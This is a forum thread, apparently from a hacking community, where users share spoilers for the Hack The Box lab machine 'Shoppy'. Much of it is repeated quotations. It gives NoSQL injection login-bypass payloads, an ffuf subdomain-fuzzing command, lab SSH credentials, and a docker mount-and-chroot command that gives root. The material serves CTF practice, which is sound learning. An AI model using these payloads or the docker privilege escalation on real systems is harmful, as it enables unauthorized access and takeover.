Posts: 10 Threads: 0 Joined: N/A September 18, 2022 at 5:47 AM (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords. Finding mattermost subdomain: ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
(September 18, 2022, 05:42 AM)WhiteWolf9007 Wrote: (September 18, 2022, 03:02 AM)7r4c3 Wrote: (September 17, 2022, 11:40 PM)hack5sucks Wrote: (September 17, 2022, 11:37 PM)wesleyjones001 Wrote: I figured out why this payload is needed.
Example alternatives:
admin' || '"123"
admin' || '"anything_in_here_except_single_quotes"
josh' || '""
admin' || '""
Unfortunately this type of payload does not seem to be on any major sites.
It would also be possiple to brute force the username using this payload using fuff.
Sample was a deploy's password??
(September 17, 2022, 11:32 PM)ysoserious Wrote: (September 17, 2022, 11:31 PM)dumpster Wrote: Did you get the root
Yes
how you guys found a password fo deploy?
SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then,
sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
using gtfo we have
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:
mine is showing that user jaeger is not allowed to execute this as root. sudo -u deploy /home/deploy/password-manager Posts: 8 Threads: 0 Joined: N/A September 18, 2022 at 6:40 AM (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169 Ahhh thanks! Idk why I didnt think of sqli on the search field after login. Makes sense! Yeah I was fuzzing for the subdomain with a bad wordlist so I didnt know if there were any breadcrumbs that pointed to it. Sounds like it was just more random enuming and hoping your wordlist had "mattermost" in it. One last thing, how did you come up with the injection string? Its different than what I've used and seen in the past. Cheers! Posts: 0 Threads: 0 Joined: N/A September 18, 2022 at 7:06 AM How did u find user josh for the mattermost cred? Posts: 5 Threads: 0 Joined: N/A September 18, 2022 at 7:47 AM (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
(September 18, 2022, 05:42 AM)WhiteWolf9007 Wrote: (September 18, 2022, 03:02 AM)7r4c3 Wrote: (September 17, 2022, 11:40 PM)hack5sucks Wrote: (September 17, 2022, 11:37 PM)wesleyjones001 Wrote: I figured out why this payload is needed.
Example alternatives:
admin' || '"123"
admin' || '"anything_in_here_except_single_quotes"
josh' || '""
admin' || '""
Unfortunately this type of payload does not seem to be on any major sites.
It would also be possiple to brute force the username using this payload using fuff.
Sample was a deploy's password??
(September 17, 2022, 11:32 PM)ysoserious Wrote: Yes
how you guys found a password fo deploy?
SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then,
sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
using gtfo we have
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:
mine is showing that user jaeger is not allowed to execute this as root.
sudo -u deploy /home/deploy/password-manager where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that Posts: 0 Threads: 0 Joined: N/A September 18, 2022 at 7:57 AM (September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote: (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
(September 18, 2022, 05:42 AM)WhiteWolf9007 Wrote: (September 18, 2022, 03:02 AM)7r4c3 Wrote: (September 17, 2022, 11:40 PM)hack5sucks Wrote: Sample was a deploy's password??
how you guys found a password fo deploy?
SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then,
sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
using gtfo we have
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:
mine is showing that user jaeger is not allowed to execute this as root.
sudo -u deploy /home/deploy/password-manager
where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that This way: cat /home/deploy/password-manager U will see: Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported ! Pay attention to this: Access Denided is logging in deny. Before that, it tried to read creds.txt. So We see Access granted is logging in success. So 'Sample' is the master password! Posts: 31 Threads: 0 Joined: N/A September 18, 2022 at 9:01 AM (September 17, 2022, 10:32 PM)araaraara Wrote: (September 17, 2022, 10:22 PM)annehathaway Wrote: You can sudo -l to check what commands you can run, you'll see you can run as deploy a tool called password-manager. If you strings on the binary you won't see the password but if you just cat it you'll find deploy's password. Then, you are able to use docker, gtfobins to see how to get a shell as root..
I can't figure out tho how you are able to bypass login auth on shoppy Admin, never seen and couldn't find that admin'||"===' payload if someone can explain it to me please)
cant find the password using cat where is the password tried many time not able to get access, please help Posts: 31 Threads: 0 Joined: N/A September 18, 2022 at 9:26 AM (September 18, 2022, 07:57 AM)nhocit Wrote: (September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote: (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
(September 18, 2022, 05:42 AM)WhiteWolf9007 Wrote: (September 18, 2022, 03:02 AM)7r4c3 Wrote: SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then,
sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
using gtfo we have
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:
mine is showing that user jaeger is not allowed to execute this as root.
sudo -u deploy /home/deploy/password-manager
where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that
This way:
cat /home/deploy/password-manager
U will see: Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
Pay attention to this: Access Denided is logging in deny. Before that, it tried to read creds.txt. So We see Access granted is logging in success. So 'Sample' is the master password! Not able to get access by Sample password Posts: 0 Threads: 0 Joined: N/A September 18, 2022 at 9:40 AM (September 18, 2022, 09:26 AM)pandu Wrote: (September 18, 2022, 07:57 AM)nhocit Wrote: (September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote: (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
(September 18, 2022, 05:42 AM)WhiteWolf9007 Wrote: mine is showing that user jaeger is not allowed to execute this as root.
sudo -u deploy /home/deploy/password-manager
where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that
This way:
cat /home/deploy/password-manager
U will see: Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
Pay attention to this: Access Denided is logging in deny. Before that, it tried to read creds.txt. So We see Access granted is logging in success. So 'Sample' is the master password!
Not able to get access by Sample password sudo -u deploy /home/deploy/password-manager Enter password for jaeger. Then master password is required, enter Sample (S is a capital letter). If not then terminate the machine in Hackthebox, and create a new instance! Posts: 31 Threads: 0 Joined: N/A September 18, 2022 at 9:44 AM (September 18, 2022, 09:40 AM)nhocit Wrote: (September 18, 2022, 09:26 AM)pandu Wrote: (September 18, 2022, 07:57 AM)nhocit Wrote: (September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote: (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
sudo -u deploy /home/deploy/password-manager
where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that
This way:
cat /home/deploy/password-manager
U will see: Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
Pay attention to this: Access Denided is logging in deny. Before that, it tried to read creds.txt. So We see Access granted is logging in success. So 'Sample' is the master password!
Not able to get access by Sample password
sudo -u deploy /home/deploy/password-manager
Enter password for jaeger. Then master password is required, enter Sample (S is a capital letter). If not then terminate the machine in Hackthebox, and create a new instance! Thanks for this one bro I got it. Posts: 22 Threads: 0 Joined: N/A September 18, 2022 at 10:19 AM (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain 1. this is NoSQL injection. you can check the web source codes after login as josh. 2. same NoSQL injection applies to search. 3. this is which i dislike most. of all the wordlists under SecLists/Discovery/DNS/, only 2 contains this subdomain, which are not in my frequently used wordlists for vhost enumeration. |
